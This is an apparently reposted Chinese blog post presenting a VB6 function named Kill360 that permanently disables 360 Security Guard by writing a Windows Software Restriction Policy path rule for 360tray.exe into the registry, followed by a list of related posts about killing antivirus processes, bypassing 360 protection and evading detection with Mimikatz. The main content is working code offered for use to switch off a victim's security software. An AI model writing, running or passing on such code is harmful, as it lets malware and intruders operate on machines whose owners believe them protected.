利用Windows的启动机制实现拦截360的运行

最新推荐文章于 2023-08-22 23:12:12 发布
最新推荐文章于 2023-08-22 23:12:12 发布
阅读量90 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/CodingMouse/p/3330301.html
版权

今天无意中发现一个漏洞,可以轻松干掉360,就是利用Windows的启动机制实现拦截360的运行。Windows中有一个叫做软件限制策略的功能,可以用来限制应用程序的运行,和IFEO比较像,只不过IFEO早已过时,而且被360彻底封杀掉了,而windows的进程启动限制机制360倒没有注意到。于是,直接写一个限制360启动的规则加入注册表,这样360就再也无法启动了,这下360终于不牛B了吧,哈哈!此漏洞在360安全卫士9.1+WindowsXP/SP3下测试成功。同样地,此漏洞或许也适用于其它杀毒软件,不过有待测试。

 1 Option Explicit
 2 Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
 3 Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
 4 Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
 5 Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
 6  
 7 Private Const HKEY_LOCAL_MACHINE = &H80000002
 8  
 9 Private Const REG_SZ = 1
10 Private Const REG_QWORD = 11
11 Private Const REG_DWORD = 4
12  
13 '永久封锁掉360禁止它再启动
14 Public Function Kill360() As Boolean
15         Dim hKey As Long
16         Dim lRet As Long
17         Dim strFileName As String
18         Dim bytData(0 To 7) As Byte
19         strFileName = "360tray.exe" '360的文件名,这里以路径规则举例
20         lRet = RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{487462c2-2064-4e1f-aeae-20b7095a41bb}", hKey)
21         If lRet = 0 Then
22                 lRet = RegSetValueEx(hKey, "Description", 0&, REG_SZ, ByVal vbNullString, 0)
23                 lRet = RegSetValueEx(hKey, "ItemData", 0&, REG_SZ, ByVal strFileName, lstrlen(strFileName))
24                 lRet = RegSetValueEx(hKey, "LastModified", 0&, REG_QWORD, bytData(0), 8)
25                 lRet = RegSetValueEx(hKey, "SaferFlags", 0&, REG_DWORD, 0, 4)
26                 RegCloseKey hKey
27                 Kill360 = (lRet = 0)
28         End If
29 End Function

 

转载于:https://www.cnblogs.com/CodingMouse/p/3330301.html

weixin_34324081
关注
[网络安全自学篇] 九十二.《Windows黑客编程技术详解》之病毒启动技术创建进程API、突破SESSION0隔离、内存加载详解(3)
杨秀璋的专栏
07-27 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第三篇文章主要介绍木马病毒启动技术,包括创建进程API、突破SESSION0隔离、内存加载详解,希望对您有所帮助。
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
热门推荐
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
360拦截exe安装,开机启动
bornonew的博客
05-22 3474
最近对exe进行打包安装,发现总是被360弹框拦截,很不友好。最后解决方案如下:1.打包时,将开机启动做成可选项,供用户选择。2.对打包文件和exe文件进行数字签名3.将安装包提交到http://open.soft.360.cn 进行检测。另 360拦截与如何实现开机启动方式并没有太大的关系,以下几种方式都会被360拦截。1.从注册表中增加开机启动项SOFTWARE\Microsoft\Windo...
结束360Safe和360保险箱进程
baduan2162的博客
07-20 286
unitUnit1;interfaceusesWindows,Messages,SysUtils,Variants,Classes,Graphics,Controls,Forms,Dialogs,StdCtrls,TlHelp32;typeTForm1=class(TForm)Button1:TButton;procedureButt...
360 kill android,过核晶模式KILL360全套程序
weixin_35555014的博客
05-28 1797
这是18年在360安全响应中心发布的“kill核晶防护下360全套程序”漏洞,奖励了1K,时隔2年,留个纪念。一、详细说明在核晶防护下的360基本任何RING3下的程序都无法K掉,即使有,也会被拦截。但可通过运行伪造虚拟机白文件暂时关闭360核晶防护,再调用POSTTHREADMESSAGE对360产品每条线程发送WM_QUIT,使其强制关闭。注:当然在没有核晶防护的情况下,消息攻击可直接K掉,所...
360KILL 清理
09-17
360KILL 清理360KILL 清理360KILL 清理360KILL 清理360KILL 清理360KILL 清理
数字驱动分析笔记之360SelfProtection1
08-03
MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion \Windows\AppInit_DLLs`、`\\SHELLEXECUTEHOOKS`和`\\SAFER\\CODEIDENTIFIERS`等关键位置的监控,这些都是系统启动和软件限制策略的重要部分,360...
mysql安装错误集合及 完美解决方案(卸载不干净,360拦截,环境缺失,驱动缺失
weixin_44689392的博客
06-12 529
MYSQL数据库安装 Mysql引擎 数据库的引擎是用于存储,处理和保护数据的核心服务。利用数据库引擎可以控制访问权限并且快速的处理事务,利用数据库引擎创建连接事务处理。 MySQL数据库引擎分类 (1)ISAM ISAM是一个定义明确且历经时间考验的数据表格管理方法,它在设计之时就考虑到数据库被查询的次数要远大于更新的次数。因此,ISAM执行读取操作的速度很快,而...
Windows Hook案例分析与技术探索
John_ToStr的博客
06-29 4630
Hook是Windows中提供的一种用以替换DOS下“中断“的系统机制,中文译为“挂钩”或“钩子”。在对 特定的系统事件进行Hook后,一旦发生已Hook事件,对该事件进行Hook的程序就会收到系统的通知, 这时程序就能在第一时间对该事件做出响应。 钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有 到达目的程序前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理 (改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。..
360的自启动代码(最新测试)
07-13
这是一个可以过360的代码例子 大家可以下载下来看看
Win7-ring0-Kill360-AllProcess.zip_kill process win7_win7_win7 36
07-14
Win7下测试成功 xp自己去试验 前面的说明一定要看哦
Kill 360Safe delphi版
12-18
网上有c和VB的代码,故做了一个delphi的 结束360安全卫士进程delphi代码
干掉 360驱动程序
03-31
使用驱动程序干掉 360,不要用来干坏事呀,否则与我无关,呵呵
计划任务绕过360核晶自启动 c++
qq_37561898的博客
06-25 3535
绕过360核晶实现计划任务开机自启(带bypass uac)
Mimikatz免杀实战:绕过360核晶和defender
最新发布
xf555er的博客
08-22 3019
通常来说,即使我们成功实现了mimikatz的静态免杀,其抓取hash的行为仍可能会被防病毒软件检测到虽然你可以通过修改mimikatz的源码来实现行为上的免杀,但这需要花费大量的时间。我建议针对具体功能的代码来实现免杀,例如,mimikatz的dump hash功能主要依赖于Windows API的Minidump函数。
[WinForm]写一个小程序把指定目录的程序添加到开机自动启动(无法绕过360检查)
德仔
04-10 3565
网友阿东提示了这样一个需求:写一个小程序把指定目录的程序添加到开机自动启动,跳过360 我就到百度上搜了一下:http://www.cnblogs.com/zcm123/archive/2012/06/07/2540339.html usingMicrosoft.Win32; #region 将程序添加到启动项 /// /// 注册表操作,将程序添加到启
Atitit.木马病毒强制强行关闭360 360tray.exe的方法
weixin_33923762的博客
03-17 847
Atitit.木马病毒强制强行关闭360 360tray.exe的方法   1. taskkill /im 进程名称1 2. 用 wmic process where name="进程名称" call terminate 这个不需要知道进程的PID号 1 3. Ntsd -c q -p pid2 4. Gui界面关闭方法2 4.1. XueTr2 4.2. Other gui接口2 5. 瑞...
深入解析Java Struts2拦截实现机制
"Java Struts2 框架的拦截实现及请求处理流程" 在Java Web开发中,Struts2是一个广泛使用的MVC框架,它提供了强大的功能和灵活的架构。本文主要聚焦于Struts2中的拦截器(Interceptor)实现以及请求处理流程。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值